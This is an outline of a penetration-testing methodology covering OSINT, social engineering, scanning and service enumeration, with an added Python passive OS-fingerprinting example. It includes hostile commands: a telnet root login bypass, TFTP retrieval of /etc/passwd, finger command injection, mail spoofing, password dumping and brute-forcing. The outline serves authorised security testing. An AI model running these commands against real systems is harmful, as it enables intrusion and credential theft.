Penetration Testing Framework 0.58


1. inurl:Citrix/AccessPlatform/auth/login.aspx

2. X11 port 6000+ open

2.1. X11 Enumeration

2.1.1. List open windows

2.1.2. Authentication Method

2.1.2.1. Xauth

2.1.2.2. Xhost

2.2. X11 Exploitation

2.2.1. xwd

2.2.1.1. xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm

2.2.2. Keystrokes

2.2.2.1. Received

2.2.2.2. Transmitted

2.2.3. Screenshots

2.2.4. xhost +

2.3. Examine Configuration Files

2.3.1. /etc/Xn.hosts

2.3.2. /usr/lib/X11/xdm

2.3.2.1. Untitled

2.3.3. /usr/lib/X11/xdm/xsession

2.3.4. /usr/lib/X11/xdm/xsession-remote

2.3.5. /usr/lib/X11/xdm/xsession.0

2.3.6. /usr/lib/X11/xdm/xdm-config

2.3.6.1. DisplayManager*authorize:on

3. pwdump [-h][-o][-u][-p] machineName

4. Nabil contributed the AS/400 section.

5. Client Side Security

6. Back end files

6.1. .exe / .txt / .doc / .ppt / .pdf / .vbs / .pl / .sh / .bat / .sql / .xls / .mdb / .conf

7. Set objShell = CreateObject("WScript.Shell")

8. Check visible areas for sensitive information.

9. InitialProgram=c:\windows\system32\cmd.exe

10. txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c:\hostlist.txt

11. http://secunia.com/advisories/search/?search=citrix

12. Pre-Inspection Visit - template

13. Network Footprinting (Reconnaissance). The tester attempts to gather as much information as possible about the selected network. Reconnaissance can take two forms, active and passive. A passive approach is always the best starting point, as it would normally defeat intrusion detection systems and the other forms of protection afforded to the network; it usually involves discovering publicly available information with a web browser, by visiting newsgroups and so on. An active form is more intrusive, may show up in audit logs, and may take the form of an attempted DNS zone transfer or a social engineering attack.

13.1. Untitled

13.1.1. Authoritative Bodies

13.1.1.1. IANA - Internet Assigned Numbers Authority

13.1.1.2. ICANN - Internet Corporation for Assigned Names and Numbers.

13.1.1.3. NRO - Number Resource Organisation

13.1.1.4. RIR - Regional Internet Registry

13.1.1.4.1. AFRINIC - African Network Information Centre

13.1.1.4.2. APNIC - Asia Pacific Network Information Centre

13.1.1.4.3. ARIN - American Registry for Internet Numbers

13.1.1.4.4. LACNIC - Latin America & Caribbean Network Information Centre

13.1.1.4.5. RIPE NCC - Réseaux IP Européens Network Coordination Centre

13.1.2. Websites

13.1.2.1. Central Ops

13.1.2.1.1. Domain Dossier

13.1.2.1.2. Email Dossier

13.1.2.2. DNS Stuff

13.1.2.2.1. Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries.

13.1.2.3. Fixed Orbit

13.1.2.3.1. Autonomous System lookups and other online tools available.

13.1.2.4. Geektools

13.1.2.5. IP2Location

13.1.2.5.1. Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information.

13.1.2.6. Kartoo

13.1.2.6.1. Metasearch engine that visually presents its results.

13.1.2.7. MyIPNeighbors.com

13.1.2.7.1. Excellent site that gives you details of the domains sharing the IP queried and, conversely, IP to DNS resolution

13.1.2.8. My-IP-Neighbors.com

13.1.2.8.1. Excellent site that can be used if the above is down

13.1.2.9. myipneighbors.net

13.1.2.10. Netcraft

13.1.2.10.1. Online search tool allowing queries for host information.

13.1.2.11. Passive DNS Replication

13.1.2.11.1. Finds shared domains based on supplied IP addresses

13.1.2.11.2. Note: - Website utilised by nmap hostmap.nse script

13.1.2.12. Robtex

13.1.2.12.1. Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results with pointers, A, MX records and AS connectivity displayed.

13.1.2.12.2. Note: - Can be unreliable with old entries (Use CentralOps to verify)

13.1.2.13. Traceroute.org

13.1.2.13.1. Website listing a large number of links to online traceroute resources.

13.1.2.14. Wayback Machine

13.1.2.14.1. Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.

13.1.2.15. Whois.net

13.1.3. Tools

13.1.3.1. Cheops-ng

13.1.3.2. Country whois

13.1.3.3. Domain Research Tool

13.1.3.4. Firefox Plugins

13.1.3.4.1. AS Number

13.1.3.4.2. Shazou

13.1.3.4.3. Firecat Suite

13.1.3.5. Gnetutil

13.1.3.6. Goolag Scanner

13.1.3.7. Greenwich

13.1.3.8. Maltego

13.1.3.9. GTWhois

13.1.3.10. Sam Spade

13.1.3.11. Smart whois

13.1.3.12. SpiderFoot

13.2. Internet Search

13.2.1. General Information

13.2.1.1. Web Investigator

13.2.1.2. Tracesmart

13.2.1.3. Friends Reunited

13.2.1.4. Ebay - profiles etc.

13.2.2. Financial

13.2.2.1. EDGAR - Company information, including real-time filings. US

13.2.2.2. Google Finance - General Finance Portal

13.2.2.3. Hoovers - Business Intelligence, Insight and Results. US and UK

13.2.2.4. Companies House UK

13.2.2.5. Land Registry UK

13.2.3. Phone book/ Electoral Roll Information

13.2.3.1. 123people

13.2.3.1.1. http://www.123people.co.uk/s/firstname+lastname/world

13.2.3.2. 192.com

13.2.3.2.1. Electoral Roll Search. UK

13.2.3.3. 411

13.2.3.3.1. Online White Pages and Yellow Pages. US

13.2.3.4. Untitled

13.2.3.4.1. Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US

13.2.3.5. BT.com. UK

13.2.3.5.1. Residential

13.2.3.5.2. Business

13.2.3.6. Pipl

13.2.3.6.1. Untitled

13.2.3.6.2. http://pipl.com/search/?Email=john%40example.com&CategoryID=4&Interface=1

13.2.3.6.3. http://pipl.com/search/?Username=????&CategoryID=5&Interface=1

13.2.3.7. Spokeo

13.2.3.7.1. http://www.spokeo.com/user?q=domain_name

13.2.3.7.2. http://www.spokeo.com/user?q=email_address

13.2.3.8. Yasni

13.2.3.8.1. http://www.yasni.co.uk/index.php?action=search&search=1&sh=&name=firstname+lastname&filter=Keyword

13.2.3.9. Zabasearch

13.2.3.9.1. People Search Engine. US

13.2.4. Generic Web Searching

13.2.4.1. Code Search

13.2.4.2. Forum Entries

13.2.4.3. Google Hacking Database

13.2.4.4. Google

13.2.4.4.1. Email Addresses

13.2.4.4.2. Contact Details

13.2.4.5. Newsgroups/forums

13.2.4.6. Blog Search

13.2.4.6.1. Yammer

13.2.4.6.2. Google Blog Search

13.2.4.6.3. Technorati

13.2.4.6.4. Jaiku

13.2.4.6.5. Present.ly

13.2.4.6.6. Twitter Network Browser

13.2.4.7. Search Engine Comparison/ Aggregator Sites

13.2.4.7.1. Clusty

13.2.4.7.2. Grokker

13.2.4.7.3. Zuula

13.2.4.7.4. Exalead

13.2.4.7.5. Delicious

13.2.5. Metadata Search

13.2.5.1. Untitled

13.2.5.1.1. MetaData Visualisation Sites

13.2.5.1.2. Tools

13.2.5.1.3. Wikipedia Metadata Search

13.2.6. Social/ Business Networks

13.2.6.1. Untitled

13.2.6.1.1. Africa

13.2.6.1.2. Australia

13.2.6.1.3. Belgium

13.2.6.1.4. Holland

13.2.6.1.5. Hungary

13.2.6.1.6. Iran

13.2.6.1.7. Japan

13.2.6.1.8. Korea

13.2.6.1.9. Poland

13.2.6.1.10. Russia

13.2.6.1.11. Sweden

13.2.6.1.12. UK

13.2.6.1.13. US

13.2.6.1.14. Assorted

13.2.7. Resources

13.2.7.1. OSINT

13.2.7.2. International Directory of Search Engines

13.3. DNS Record Retrieval from publicly available servers

13.3.1. Types of Information Records

13.3.1.1. SOA Records - Indicates the server that has authority for the domain.

13.3.1.2. MX Records - List of a host’s or domain’s mail exchanger server(s).

13.3.1.3. NS Records - List of a host’s or domain’s name server(s).

13.3.1.4. A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS.

13.3.1.5. PTR Records - Lists a host’s domain name, host identified by its IP address.

13.3.1.6. SRV Records - Service location record.

13.3.1.7. HINFO Records - Host information record with CPU type and operating system.

13.3.1.8. TXT Records - Generic text record.

13.3.1.9. CNAME - A host’s canonical name allows additional names/ aliases to be used to locate a computer.

13.3.1.10. RP - Responsible person for the domain.

13.3.2. Database Settings

13.3.2.1. Version.bind

13.3.2.2. Serial

13.3.2.3. Refresh

13.3.2.4. Retry

13.3.2.5. Expiry

13.3.2.6. Minimum

13.3.3. Sub Domains

13.3.4. Internal IP ranges

13.3.4.1. Reverse DNS for IP Range

13.3.5. Zone Transfer

13.4. Social Engineering

13.4.1. Remote

13.4.1.1. Phone

13.4.1.1.1. Scenarios

13.4.1.1.2. Results

13.4.1.1.3. Contact Details

13.4.1.2. Email

13.4.1.2.1. Scenarios

13.4.1.2.2. Software

13.4.1.2.3. Results

13.4.1.2.4. Contact Details

13.4.1.3. Other

13.4.2. Local

13.4.2.1. Personas

13.4.2.1.1. Name

13.4.2.1.2. Phone

13.4.2.1.3. Email

13.4.2.1.4. Business Cards

13.4.2.2. Contact Details

13.4.2.2.1. Name

13.4.2.2.2. Phone number

13.4.2.2.3. Email

13.4.2.2.4. Room number

13.4.2.2.5. Department

13.4.2.2.6. Role

13.4.2.3. Scenarios

13.4.2.3.1. New IT employee

13.4.2.3.2. Fire Inspector

13.4.2.4. Results

13.4.2.5. Maps

13.4.2.5.1. Satellite Imagery

13.4.2.5.2. Building layouts

13.4.2.6. Other

13.5. Dumpster Diving

13.5.1. Rubbish Bins

13.5.2. Contract Waste Removal

13.5.3. Ebay ex-stock sales i.e. HDD

13.6. Web Site copy

13.6.1. httrack

13.6.2. teleport pro

13.6.3. Black Widow

14. Discovery & Probing. Enumeration can serve two distinct purposes in an assessment: OS fingerprinting, and identifying the remote applications being served. OS fingerprinting, or TCP/IP stack fingerprinting, is the process of determining the operating system in use on a remote host by analysing packets received from that host. There are two distinct ways to fingerprint an OS: actively (e.g. nmap) or passively (e.g. scanrand). Passive OS fingerprinting determines the remote OS from the packets received only and does not require any packets to be sent. Active OS fingerprinting is very noisy: it sends packets to the remote host and waits for a reply (or the lack of one). Different OSes respond differently to certain types of packet (the response is governed by the RFCs plus any proprietary behaviour the vendor, notably Microsoft, has enabled within the stack), so custom packets can be sent to elicit distinguishing replies. The remote applications being served on a host can be determined from its open ports. By port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.
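The passive side of stack fingerprinting described above, as an added example that is not part of the original framework: it pulls the IP TTL, DF bit, TCP window and option order out of a raw SYN and matches them against a small illustrative signature table. The sample packets and the signature entries are constructed for this example (a real passive fingerprinter such as p0f carries a far larger database), and `build_syn` exists only to fabricate test input.

```python
import struct
from dataclasses import dataclass
from typing import Optional

# Starting TTLs used by common stacks (assumed set); the observed TTL is
# rounded up to the nearest one to recover the sender's initial TTL and hop count.
INITIAL_TTLS = (32, 64, 128, 255)


@dataclass
class SynFeatures:
    ttl: int             # TTL as observed on the wire
    initial_ttl: int     # inferred starting TTL of the sending stack
    hops: int            # initial_ttl - ttl
    df: bool             # IP "don't fragment" bit
    window: int          # TCP receive window advertised in the SYN
    mss: Optional[int]
    wscale: Optional[int]
    opt_layout: str      # TCP option order, p0f-style, e.g. "mss,sok,ts,nop,ws"


def parse_ipv4_tcp_syn(pkt: bytes) -> SynFeatures:
    """Extract the stack-specific fields from a raw IPv4 + TCP initial SYN."""
    ver_ihl, _tos, _tlen, _ident, flags_frag, ttl, proto = struct.unpack("!BBHHHBB", pkt[:10])
    if ver_ihl >> 4 != 4 or proto != 6:
        raise ValueError("not an IPv4/TCP packet")
    ihl = (ver_ihl & 0x0F) * 4
    df = bool(flags_frag & 0x4000)
    tcp = pkt[ihl:]
    _sport, _dport, _seq, _ack, off_flags, window = struct.unpack("!HHIIHH", tcp[:16])
    data_off = (off_flags >> 12) * 4
    flags = off_flags & 0x01FF
    if not flags & 0x02 or flags & 0x10:          # SYN set, ACK clear
        raise ValueError("not an initial SYN")
    opts = tcp[20:data_off]
    mss = wscale = None
    layout = []
    i = 0
    while i < len(opts):
        kind = opts[i]
        if kind == 0:                              # end of option list
            layout.append("eol")
            break
        if kind == 1:                              # NOP padding
            layout.append("nop")
            i += 1
            continue
        length = opts[i + 1]
        if length < 2 or i + length > len(opts):
            raise ValueError("malformed TCP option")
        data = opts[i + 2:i + length]
        if kind == 2:
            mss = int.from_bytes(data, "big")
            layout.append("mss")
        elif kind == 3:
            wscale = data[0]
            layout.append("ws")
        elif kind == 4:
            layout.append("sok")
        elif kind == 8:
            layout.append("ts")
        else:
            layout.append(f"opt{kind}")
        i += length
    initial = next(t for t in INITIAL_TTLS if t >= ttl)
    return SynFeatures(ttl, initial, initial - ttl, df, window, mss, wscale, ",".join(layout))


# Illustrative signatures (assumed for this example): initial TTL, DF handling and
# option order are the fields that differ most between stacks.
SIGNATURES = [
    ("Linux 2.6 (illustrative)", {"initial_ttl": 64, "df": True, "opt_layout": "mss,sok,ts,nop,ws"}),
    ("Windows XP/2003 (illustrative)", {"initial_ttl": 128, "df": True, "opt_layout": "mss,nop,nop,sok"}),
    ("Windows 7 (illustrative)", {"initial_ttl": 128, "df": True, "window": 8192,
                                  "opt_layout": "mss,nop,ws,nop,nop,sok"}),
]


def classify(f: SynFeatures) -> str:
    """Return the most specific signature whose fields all match, else 'unknown'."""
    best_name, best_score = "unknown", 0
    for name, sig in SIGNATURES:
        if all(getattr(f, k) == v for k, v in sig.items()) and len(sig) > best_score:
            best_name, best_score = name, len(sig)
    return best_name


def build_syn(ttl: int, df: bool, window: int, options: bytes) -> bytes:
    """Constructed sample input: a minimal IPv4 + TCP SYN (checksums left zero)."""
    tcp_len = 20 + len(options)
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + tcp_len, 0x1234,
                         0x4000 if df else 0, ttl, 6, 0, b"\x0a\x00\x00\x01", b"\x0a\x00\x00\x02")
    tcp_hdr = struct.pack("!HHIIHHHH", 40000, 80, 1, 0, ((tcp_len // 4) << 12) | 0x02, window, 0, 0)
    return ip_hdr + tcp_hdr + options


# Option blobs in the order each stack emits them (constructed, padded to 4 bytes).
LINUX_OPTS = bytes.fromhex("020405b4" + "0402" + "080a0000000100000000" + "01" + "030307")
WINXP_OPTS = bytes.fromhex("020405b4" + "01" + "01" + "0402")
WIN7_OPTS = bytes.fromhex("020405b4" + "01" + "030302" + "01" + "01" + "0402")

if __name__ == "__main__":
    for label, pkt in [("linux", build_syn(52, True, 5840, LINUX_OPTS)),
                       ("xp", build_syn(120, True, 65535, WINXP_OPTS)),
                       ("win7", build_syn(126, True, 8192, WIN7_OPTS))]:
        f = parse_ipv4_tcp_syn(pkt)
        print(f"{label}: {classify(f)} ttl={f.ttl} (~{f.hops} hops) opts={f.opt_layout}")
```

On a defended network the same parser, fed from a capture, gives a passive inventory of stacks and hop distances without sending a packet, which is what makes the approach invisible to the IDS the paragraph mentions.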

14.1. Default Port Lists

14.1.1. Windows

14.1.2. *nix

14.2. Enumeration tools and techniques - The vast majority can be used generically; however, certain bespoke applications require their own specific toolsets. Default passwords are platform and vendor specific.

14.2.1. General Enumeration Tools

14.2.1.1. nmap

14.2.1.1.1. nmap -n -A -PN -p- -T Aggressive -iL nmap.targetlist -oX nmap.syn.results.xml

14.2.1.1.2. nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results

14.2.1.1.3. nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results

14.2.1.1.4. nmap -A -sS -PN -n --script:all ip_address --reason

14.2.1.1.5. grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list

14.2.1.2. netcat

14.2.1.2.1. nc -v -n IP_Address port

14.2.1.2.2. nc -v -w 2 -z IP_Address port_range/port_number

14.2.1.3. amap

14.2.1.3.1. amap -bqv 192.168.1.1 80

14.2.1.3.2. amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]

14.2.1.4. xprobe2

14.2.1.4.1. xprobe2 192.168.1.1

14.2.1.5. sinfp

14.2.1.5.1. ./sinfp.pl -i -p

14.2.1.6. nbtscan

14.2.1.6.1. nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)

14.2.1.7. hping

14.2.1.7.1. hping ip_address

14.2.1.8. scanrand

14.2.1.8.1. scanrand ip_address:all

14.2.1.9. unicornscan

14.2.1.9.1. unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/ CIDR_NET_MASK: S-E

14.2.1.10. netenum

14.2.1.10.1. netenum network/netmask timeout

14.2.1.11. fping

14.2.1.11.1. fping -a -d hostname/ (Network/Subnet_Mask)

14.2.2. Firewall Specific Tools

14.2.2.1. firewalk

14.2.2.1.1. firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]

14.2.2.2. ftester

14.2.2.2.1. Host 1: ./ftestd -i eth0 -v

14.2.2.2.2. Host 2: ./ftest -f ftest.conf -v -d 0.01

14.2.2.2.3. Then: ./freport ftest.log ftestd.log

14.2.3. Default Passwords (Examine list)

14.2.3.1. Passwords A

14.2.3.2. Passwords B

14.2.3.3. Passwords C

14.2.3.4. Passwords D

14.2.3.5. Passwords E

14.2.3.6. Passwords F

14.2.3.7. Passwords G

14.2.3.8. Passwords H

14.2.3.9. Passwords I

14.2.3.10. Passwords J

14.2.3.11. Passwords K

14.2.3.12. Passwords L

14.2.3.13. Passwords M

14.2.3.14. Passwords N

14.2.3.15. Passwords O

14.2.3.16. Passwords P

14.2.3.17. Passwords R

14.2.3.18. Passwords S

14.2.3.19. Passwords T

14.2.3.20. Passwords U

14.2.3.21. Passwords V

14.2.3.22. Passwords W

14.2.3.23. Passwords X

14.2.3.24. Passwords Y

14.2.3.25. Passwords Z

14.2.3.26. Passwords (Numeric)

14.3. Active Hosts

14.3.1. Open TCP Ports

14.3.2. Closed TCP Ports

14.3.3. Open UDP Ports

14.3.4. Closed UDP Ports

14.3.5. Service Probing

14.3.5.1. SMTP Mail Bouncing

14.3.5.2. Banner Grabbing

14.3.5.2.1. Other

14.3.5.2.2. HTTP

14.3.5.2.3. HTTPS

14.3.5.2.4. SMTP

14.3.5.2.5. POP3

14.3.5.2.6. FTP

14.3.6. ICMP Responses

14.3.6.1. Type 3 (Port Unreachable)

14.3.6.2. Type 8 (Echo Request)

14.3.6.3. Type 13 (Timestamp Request)

14.3.6.4. Type 15 (Information Request)

14.3.6.5. Type 17 (Subnet Address Mask Request)

14.3.6.6. Responses from broadcast address

14.3.7. Source Port Scans

14.3.7.1. TCP/UDP 53 (DNS)

14.3.7.2. TCP 20 (FTP Data)

14.3.7.3. TCP 80 (HTTP)

14.3.7.4. TCP/UDP 88 (Kerberos)

14.3.8. Firewall Assessment

14.3.8.1. Firewalk

14.3.8.2. TCP/UDP/ICMP responses

14.3.9. OS Fingerprint

15. Enumeration

15.1. Daytime port 13 open

15.1.1. nmap nse script

15.1.1.1. daytime

15.2. FTP port 21 open

15.2.1. Fingerprint server

15.2.1.1. telnet ip_address 21 (Banner grab)

15.2.1.2. Run command ftp ip_address

15.2.1.3. [email protected]

15.2.1.4. Check for anonymous access

15.2.1.4.1. ftp ip_address (Username: anonymous OR anon; Password: [email protected])

15.2.2. Password guessing

15.2.2.1. Hydra brute force

15.2.2.2. medusa

15.2.2.3. Brutus

15.2.3. Examine configuration files

15.2.3.1. ftpusers

15.2.3.2. ftp.conf

15.2.3.3. proftpd.conf

15.2.4. MiTM

15.2.4.1. pasvagg.pl

15.3. SSH port 22 open

15.3.1. Fingerprint server

15.3.1.1. telnet ip_address 22 (banner grab)

15.3.1.2. scanssh

15.3.1.2.1. scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask

15.3.2. Password guessing

15.3.2.1. ssh [email protected]_address

15.3.2.2. guess-who

15.3.2.2.1. ./b -l username -h ip_address -p 22 -2 < password_file_location

15.3.2.3. Hydra brute force

15.3.2.4. brutessh

15.3.2.5. Ruby SSH Bruteforcer

15.3.3. Examine configuration files

15.3.3.1. ssh_config

15.3.3.2. sshd_config

15.3.3.3. authorized_keys

15.3.3.4. ssh_known_hosts

15.3.3.5. .shosts

15.3.4. SSH Client programs

15.3.4.1. tunnelier

15.3.4.2. winsshd

15.3.4.3. putty

15.3.4.4. winscp

15.4. Telnet port 23 open

15.4.1. Fingerprint server

15.4.1.1. telnet ip_address

15.4.1.1.1. Common Banner List (OS / Banner)

15.4.1.1.1.1. Solaris 8 / SunOS 5.8

15.4.1.1.1.2. Solaris 2.6 / SunOS 5.6

15.4.1.1.1.3. Solaris 2.4 or 2.5.1 / Unix(r) System V Release 4.0 (hostname)

15.4.1.1.1.4. SunOS 4.1.x / SunOS Unix (hostname)

15.4.1.1.1.5. FreeBSD / FreeBSD/i386 (hostname) (ttyp1)

15.4.1.1.1.6. NetBSD / NetBSD/i386 (hostname) (ttyp1)

15.4.1.1.1.7. OpenBSD / OpenBSD/i386 (hostname) (ttyp1)

15.4.1.1.1.8. Red Hat 8.0 / Red Hat Linux release 8.0 (Psyche)

15.4.1.1.1.9. Debian 3.0 / Debian GNU/Linux 3.0 / hostname

15.4.1.1.1.10. SGI IRIX 6.x / IRIX (hostname)

15.4.1.1.1.11. IBM AIX 4.1.x / AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.

15.4.1.1.1.12. IBM AIX 4.2.x or 4.3.x / AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.

15.4.1.1.1.13. Nokia IPSO / IPSO (hostname) (ttyp0)

15.4.1.1.1.14. Cisco IOS / User Access Verification

15.4.1.1.1.15. Livingston ComOS / ComOS - Livingston PortMaster

15.4.1.2. telnetfp

15.4.2. Password Attack

15.4.2.1. Untitled

15.4.2.2. Hydra brute force

15.4.2.3. Brutus

15.4.2.4. telnet -l "-froot" hostname (Solaris 10+)

15.4.3. Examine configuration files

15.4.3.1. /etc/inetd.conf

15.4.3.2. /etc/xinetd.d/telnet

15.4.3.3. /etc/xinetd.d/stelnet

15.5. Sendmail Port 25 open

15.5.1. Fingerprint server

15.5.1.1. telnet ip_address 25 (banner grab)

15.5.2. Mail Server Testing

15.5.2.1. Enumerate users

15.5.2.1.1. VRFY username (verifies if username exists - enumeration of accounts)

15.5.2.1.2. EXPN username (verifies if username is valid - enumeration of accounts)

15.5.2.2. Mail Spoof Test

15.5.2.2.1. HELO anything

15.5.2.2.2. MAIL FROM: spoofed_address

15.5.2.2.3. RCPT TO: valid_mail_account

15.5.2.2.4. DATA

15.5.2.2.5. . (a line containing only a full stop ends the message body)

15.5.2.2.6. QUIT

15.5.2.3. Mail Relay Test

15.5.2.3.1. Untitled

15.5.3. Examine Configuration Files

15.5.3.1. sendmail.cf

15.5.3.2. submit.cf

15.6. DNS port 53 open

15.6.1. Fingerprint server/ service

15.6.1.1. host

15.6.1.1.1. host [-aCdlnrTwv] [-c class] [-N ndots] [-R number] [-t type] [-W wait] name [server]

15.6.1.1.2. -v verbose format

15.6.1.1.3. -t (query type) Allows a user to specify a record type, i.e. A, NS, or PTR.

15.6.1.1.4. -a Same as -t ANY.

15.6.1.1.5. -l Zone transfer (if allowed).

15.6.1.1.6. -f Save to a specified filename.

15.6.1.2. nslookup

15.6.1.2.1. nslookup [ -option ... ] [ host-to-find | - [ server ]]

15.6.1.3. dig

15.6.1.3.1. dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]

15.6.1.4. whois

15.6.1.4.1. -h Use the named host to resolve the query

15.6.1.4.2. -a Use ARIN to resolve the query

15.6.1.4.3. -r Use RIPE to resolve the query

15.6.1.4.4. -p Use APNIC to resolve the query

15.6.1.4.5. -Q Perform a quick lookup

15.6.2. DNS Enumeration

15.6.2.1. Bile Suite

15.6.2.1.1. perl BiLE.pl [website] [project_name]

15.6.2.1.2. perl BiLE-weigh.pl [website] [input file]

15.6.2.1.3. perl vet-IPrange.pl [input file] [true domain file] [output file] <range>

15.6.2.1.4. perl vet-mx.pl [input file] [true domain file] [output file]

15.6.2.1.5. perl exp-tld.pl [input file] [output file]

15.6.2.1.6. perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]

15.6.2.1.7. perl qtrace.pl [ip_address_file] [output_file]

15.6.2.1.8. perl jarf-rev [subnetblock] [nameserver]

15.6.2.2. txdns

15.6.2.2.1. txdns -rt -t domain_name

15.6.2.2.2. txdns -x 50 -bb domain_name

15.6.2.3. nmap nse scripts

15.6.2.3.1. dns-random-srcport

15.6.2.3.2. dns-random-txid

15.6.2.3.3. dns-recursion

15.6.2.3.4. dns-zone-transfer

15.6.3. Examine Configuration Files

15.6.3.1. host.conf

15.6.3.2. resolv.conf

15.6.3.3. named.conf

15.7. TFTP port 69 open

15.7.1. TFTP Enumeration

15.7.1.1. tftp ip_address PUT local_file

15.7.1.2. tftp ip_address GET conf.txt (or other files)

15.7.1.3. Solarwinds TFTP server

15.7.1.4. tftp -i <IP> GET /etc/passwd (old Solaris)

15.7.2. TFTP Bruteforcing

15.7.2.1. TFTP bruteforcer

15.7.2.2. Cisco-Torch

15.8. Finger Port 79 open

15.8.1. User enumeration

15.8.1.1. finger 'a b c d e f g h' @example.com

15.8.1.2. finger [email protected]

15.8.1.3. finger [email protected]

15.8.1.4. finger [email protected]

15.8.1.5. finger [email protected]

15.8.1.6. finger **@example.com

15.8.1.7. finger [email protected]

15.8.1.8. finger @example.com

15.8.1.9. nmap nse script

15.8.1.9.1. finger

15.8.2. Command execution

15.8.2.1. finger "|/bin/[email protected]"

15.8.2.2. finger "|/bin/ls -a /@example.com"

15.8.3. Finger Bounce

15.8.3.1. finger [email protected]@victim

15.8.3.2. finger @[email protected]

15.9. Web Ports 80,8080 etc. open

15.9.1. Fingerprint server

15.9.1.1. Telnet ip_address port

15.9.1.2. Firefox plugins

15.9.1.2.1. All

15.9.1.2.2. Specific

15.9.2. Crawl website

15.9.2.1. lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source

15.9.2.2. httprint

15.9.2.3. Metagoofil

15.9.2.3.1. metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html

15.9.3. Web Directory enumeration

15.9.3.1. Nikto

15.9.3.1.1. nikto [-h target] [options]

15.9.3.2. DirBuster

15.9.3.3. Wikto

15.9.3.4. Goolag Scanner

15.9.4. Vulnerability Assessment

15.9.4.1. Manual Tests

15.9.4.1.1. Default Passwords

15.9.4.1.2. Install Backdoors

15.9.4.1.3. Method Testing

15.9.4.1.4. Upload Files

15.9.4.1.5. View Page Source

15.9.4.1.6. Input Validation Checks

15.9.4.1.7. Automated table and column iteration

15.9.4.2. Vulnerability Scanners

15.9.4.2.1. Acunetix

15.9.4.2.2. Grendelscan

15.9.4.2.3. NStealth

15.9.4.2.4. Obiwan III

15.9.4.2.5. w3af

15.9.4.3. Specific Applications/ Server Tools

15.9.4.3.1. Domino

15.9.4.3.2. Joomla

15.9.4.3.3. aspaudit.pl

15.9.4.3.4. Vbulletin

15.9.4.3.5. ZyXel

15.9.5. Proxy Testing

15.9.5.1. Burpsuite

15.9.5.2. Crowbar

15.9.5.3. Interceptor

15.9.5.4. Paros

15.9.5.5. Requester Raw

15.9.5.6. Suru

15.9.5.7. WebScarab

15.9.6. Examine configuration files

15.9.6.1. Generic

15.9.6.1.1. Examine httpd.conf/ windows config files

15.9.6.2. JBoss

15.9.6.2.1. JMX Console http://<IP>:8080/jmx-console/

15.9.6.3. Joomla

15.9.6.3.1. configuration.php

15.9.6.3.2. diagnostics.php

15.9.6.3.3. joomla.inc.php

15.9.6.3.4. config.inc.php

15.9.6.4. Mambo

15.9.6.4.1. configuration.php

15.9.6.4.2. config.inc.php

15.9.6.5. Wordpress

15.9.6.5.1. setup-config.php

15.9.6.5.2. wp-config.php

15.9.6.6. ZyXel

15.9.6.6.1. /WAN.html (contains PPPoE ISP password)

15.9.6.6.2. /WLAN_General.html and /WLAN.html (contains WEP key)

15.9.6.6.3. /rpDyDNS.html (contains DDNS credentials)

15.9.6.6.4. /Firewall_DefPolicy.html (Firewall)

15.9.6.6.5. /CF_Keyword.html (Content Filter)

15.9.6.6.6. /RemMagWWW.html (Remote MGMT)

15.9.6.6.7. /rpSysAdmin.html (System)

15.9.6.6.8. /LAN_IP.html (LAN)

15.9.6.6.9. /NAT_General.html (NAT)

15.9.6.6.10. /ViewLog.html (Logs)

15.9.6.6.11. /rpFWUpload.html (Tools)

15.9.6.6.12. /DiagGeneral.html (Diagnostic)

15.9.6.6.13. /RemMagSNMP.html (SNMP Passwords)

15.9.6.6.14. /LAN_ClientList.html (Current DHCP Leases)

15.9.6.6.15. Config Backups

15.9.7. Examine web server logs

15.9.7.1. c:\winnt\system32\Logfiles\W3SVC1

15.9.7.1.1. awk -F " " '{print $3,$11}' filename | sort | uniq (lists each client IP against the user agent it presented, one pair per line)

15.9.8. References

15.9.8.1. White Papers

15.9.8.1.1. Cross Site Request Forgery: An Introduction to a Common Web Application Weakness

15.9.8.1.2. Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity

15.9.8.1.3. Blind Security Testing - An Evolutionary Approach

15.9.8.1.4. Command Injection in XML Signatures and Encryption

15.9.8.1.5. Input Validation Cheat Sheet

15.9.8.1.6. SQL Injection Cheat Sheet

15.9.8.2. Books

15.9.8.2.1. Hacking Exposed Web 2.0

15.9.8.2.2. Hacking Exposed Web Applications

15.9.8.2.3. The Web Application Hacker's Handbook

15.9.9. Exploit Frameworks

15.9.9.1. Brute-force Tools

15.9.9.1.1. Acunetix

15.9.9.2. Metasploit

15.9.9.3. w3af

15.10. Portmapper port 111 open

15.10.1. rpcdump.py

15.10.1.1. rpcdump.py username:[email protected]_Address port/protocol (i.e. 80/HTTP)

15.10.2. rpcinfo

15.10.2.1. rpcinfo [options] IP_Address

